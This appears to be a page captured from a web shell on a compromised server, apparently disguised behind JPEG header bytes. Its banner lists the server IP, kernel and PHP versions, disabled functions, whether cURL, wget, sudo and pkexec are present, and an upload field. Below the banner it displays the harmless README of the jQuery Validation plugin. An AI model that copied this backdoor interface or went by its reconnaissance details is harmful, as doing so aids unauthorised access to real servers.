����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����
Server IP : 74.208.127.88 / Your IP : 18.118.147.65 Web Server : Apache/2.4.41 (Ubuntu) System : Linux ubuntu 5.4.0-163-generic #180-Ubuntu SMP Tue Sep 5 13:21:23 UTC 2023 x86_64 User : www-data ( 33) PHP Version : 7.4.3-4ubuntu2.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /var/www/html/admin/assets/plugins/jquery-validation/ |
Upload File : |
[jQuery Validation Plugin](http://bassistance.de/jquery-plugins/jquery-plugin-validation/) - Form validation made easy ================================ [](http://travis-ci.org/jzaefferer/jquery-validation) The jQuery Validation Plugin provides drop-in validation for your existing forms, while making all kinds of customizations to fit your application really easy. ## [Help the project](http://pledgie.com/campaigns/18159) [](http://pledgie.com/campaigns/18159) This project is looking for help! [You can donate to the ongoing pledgie campaign](http://pledgie.com/campaigns/18159) and help spread the word. If you've used the plugin, or plan to use, consider a donation - any amount will help. You can find the plan for how to spend the money on the [pledgie page](http://pledgie.com/campaigns/18159). ## Getting Started Include jQuery and the plugin on a page. Then select a form to validate and call the `validate` method. ```html <form> <input required> </form> <script src="jquery.js"></script> <script src="jquery.validation.js"></script> <script> $("form").validate(); </script> ``` For more information on how to setup a rules and customizations, [check the documentation](http://docs.jquery.com/Plugins/Validation). ## Contributing Follow the [jQuery style guide](http://contribute.jquery.com/style-guides/js), even if existing code doesn't. Add unit tests for any new or changed functionality. Lint and test your code using [Grunt](http://gruntjs.com/). If you've wrote custom methods that you'd like to contribute to additional-methods.js, create a branch, add the method there and send a pull request for that branch. ## License Copyright (c) 2013 Jörn Zaefferer Licensed under the MIT license.